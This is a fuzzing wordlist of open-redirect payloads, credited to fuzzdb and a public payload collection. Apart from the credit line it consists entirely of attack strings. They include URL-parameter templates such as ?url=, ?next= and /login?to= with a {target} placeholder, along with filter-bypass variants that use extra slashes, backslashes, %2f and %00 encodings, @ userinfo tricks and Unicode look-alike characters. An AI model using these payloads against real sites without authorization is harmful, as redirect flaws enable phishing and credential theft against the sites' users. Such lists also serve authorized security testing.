Credit : https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/redirect/redirect-urls-template.txt, https://github.com/cujanovic/Open-Redirect-Payloads/blob/master/Open-Redirect-payloads.txt
?url=http://{target}
?url=https://{target}
?next=http://{target}
?next=https://{target}
?url=http://{target}
?url=https://{target}
?url=http://{target}
?url=//{target}
?url=$2f%2f{target}
?next=//{target}
?next=$2f%2f{target}
?url=//{target}
?url=$2f%2f{target}
?url=//{target}
/redirect/{target}
/cgi-bin/redirect.cgi?{target}
/out/{target}
/out?{target}
/out?/{target}
/out?//{target}
/out?/\{target}
/out?///{target}
?view={target}
?view=/{target}
?view=//{target}
?view=/\{target}
?view=///{target}
/login?to={target}
/login?to=/{target}
/login?to=//{target}
/login?to=/\{target}
/login?to=///{target}
{target}
/{target}
//google.com/%2f..
///google.com/%2f..
////google.com/%2f..
/https://google.com/%2f..
//google.com/%2f%2e%2e
https://google.com/%2f%2e%2e
///google.com/
//google.com/
/////google.com
/////google.com/
///google.com
///\;@google.com
/.google.com
/google.com/%2f%2e%2e
/%2f%2fgoogle.com
@google.com
http://;@google.com
//;@google.com
<>//google.com
〱google.com
〵google.com
ゝgoogle.com
ーgoogle.com
ｰgoogle.com
/〱google.com
/〵google.com
/ゝgoogle.com
/ーgoogle.com
/ｰgoogle.com
//google%00.com
